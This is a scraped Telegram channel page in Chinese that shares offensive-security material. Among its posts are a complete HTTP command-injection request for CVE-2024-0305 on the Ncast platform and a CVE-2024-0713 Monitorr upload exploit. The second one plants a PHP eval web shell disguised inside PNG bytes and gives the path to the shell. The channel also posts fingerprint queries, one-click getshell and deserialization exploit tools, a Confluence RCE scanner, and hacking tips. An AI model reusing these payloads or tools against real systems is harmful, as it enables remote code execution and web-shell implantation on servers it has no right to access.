踹哈公寓 – Telegram
踹哈公寓
@Oracleimpact
4.11K subscribers
589 photos
19 videos
307 files
357 links
一等情事

https://news.1rj.ru/str/chuaihagongyu
Download Telegram
About
Blog
Apps
Platform
Join
踹哈公寓
4.11K subscribers
踹哈公寓
1.57K views
踹哈公寓
CVE-2024-0305 Ncast 平台RCE

icon_hash="-1253433910"

POST /classes/common/busiFacade.php HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
1.66K views
踹哈公寓
js攻击面拓展,正则提取JavaScript中url信息工具,可检验敏感参数,接口和挖掘未授权漏洞,手法神必备

https://github.com/BishopFox/jsluice
https://github.com/ttstormxx/jjjjjjjjjjjjjs
https://github.com/InitRoot/BurpJSLinkFinder
https://github.com/gh0stkey/HaE
https://github.com/RetireJS/retire.js
👍1😁1🤔1
1.95K views
踹哈公寓
Channel photo updated
踹哈公寓
Channel name was changed to «_3.1.6_linux_amd64»
踹哈公寓
qq黑客nday批量神入侵国内企业备案站,修改首页并留下qq,死亡buff叠得最多的一集

我中午看到了就发到tg群了,不知道群里哪edusrc的又扒拉到了教育漏洞报告平台,引了波大流,qq微步微信还有tg都在传
只能说比较符合我对于qq黑客的刻板印象,nday批量无脑梭,梭完不交src要挂个炫酷黑页狠狠装逼再留个qq号,生怕警察叔叔找不到自个。这位多梦琪兄的qq空间更是主打一个自己记录犯罪证据。打批量确实太让容易让人产生自己分外无敌超级黑客的错觉了。只能说你进了局子之后大伙会给你唱一等情事的
😁6👍2
1.94K viewsedited  
踹哈公寓
🤣5
1.89K views
踹哈公寓
Atlassian Confluence远程代码执行漏洞(CVE-2023-22527)
👍1
1.73K views
踹哈公寓
CVE-2017-3506-main.zip
96.5 KB
weblogic远程代码执行漏洞一键getshell工具
1.68K views
踹哈公寓
Java.V1.7 (1).zip
165.9 KB
java反序列化综合利用工具
1.66K views
踹哈公寓
Conflence rce 批量扫描脚本
1.71K views
踹哈公寓
atlassian-confluence-text-inline-rce.py
1.3 KB
1.69K views
踹哈公寓
审计中很多时候遇到的,为什么我跟进函数和变量都没问题,想post传参调用shell_exec导致rce的时候报了403呢

一般这种情况都是属于后台rce,其他地方给你写个什么if(!isset($_SESSION['isAdmin']) 用个请求头里的参数鉴权,没有登录前台直接post敏感目录就返回403状态码。可以扒拉其他文件找下check User Permission这些字眼,多半就是后台洞,调用本身是没问题的
🤔2
1.8K views
踹哈公寓
CVE-2024-0713 Monitorr 服务配置 upload.php 无限制上传漏洞

body="assets/php/timestamp.php"

exp:

POST /assets/php/upload.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q

------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/png

{{unquote("\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x08\x06\x00\x00\x00\\r\xa8f\x00\x00\x03\x1eIDATx\x9c\xed\xd4\x01\x09\x00A\x10\xc4\xb0Yx\xff\x96\xef\x854\x81Z\xe8m\xef\xdd6I\xbd\xbe\xdd\x80\x28\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x800\x03\x80\xb0\x1f\xbd\xf4\x07\xfa\xeb>\xbe\xab\x00\x00\x00\x00IEND\xaeB`\x82\x0d\x0a<?php class Gn261550 \x7b public function __construct\x28$HW579\x29\x7b @eval\x28\"/*ZWabn8zLCk*/\".$HW579.\"/*ZWabn8zLCk*/\"\x29; \x7d\x7dnew Gn261550\x28$_REQUEST['123']\x29;?>")}}
------WebKitFormBoundaryMmx988TUuintqO4Q--

http://x.x.x.x/assets/data/usrimg/shell.php
👍1
1.65K views
踹哈公寓
JDumpSpider-1.1-SNAPSHOT-full.jar
323 KB
HeapDump敏感信息提取工具
1
1.68K views
踹哈公寓
Forwarded from 이수
https://www.blockmedia.co.kr/archives/452873
Blockmedia
중국 해커들, 텔레그램으로 범위 확대… 한국인 데이터 유출 순위 4위 – S2W
"한국 인스타그램 계정 데이터 구합니다." 국가 배후 위협그룹을 중심으로 진행되었던 중국발 사이버 위협이 최근 텔레그램을 통해 다양한 형태로 확산하고 있는 것으로 나타났다. 사이버인텔리전스 전문기업인 S2W(에스투더블유)는 ‘중국 텔레그램 데이터 유출 및 위협 동향 분석
1.83K views
踹哈公寓
gov.cn事件型怎么提供单位证明,进去后台都写了xx市环保局了,非要给我说没有有效的单位证明他给打回了
1.81K viewsedited  
踹哈公寓
https://mp.weixin.qq.com/s/jXVTr98OGtg-A3JUFhVumw
Weixin Official Accounts Platform
【原创0day】用友YonBIP ServiceDispatcher远程代码执行漏洞
检测业务是否受到此漏洞影响,请联系长亭应急服务团队!
👏1
1.76K views
踹哈公寓
Forwarded from 鳖频道 (⑨BIE)
jenkins出RCE
省流:任意文件读读管理员密码解密登录然后后台RCE

这算个勾八RCE你任意文件读就任意文件读为啥要说成RCE
1.65K views
踹哈公寓
Forwarded from 赛博安全威胁情报🥸
一群黑灰产从业者,二手贩子。
还公安内网确定身份?
前脚打击涉网犯罪专家?后脚就副业勒索了?
#吃瓜
🤩6👏21
1.55K views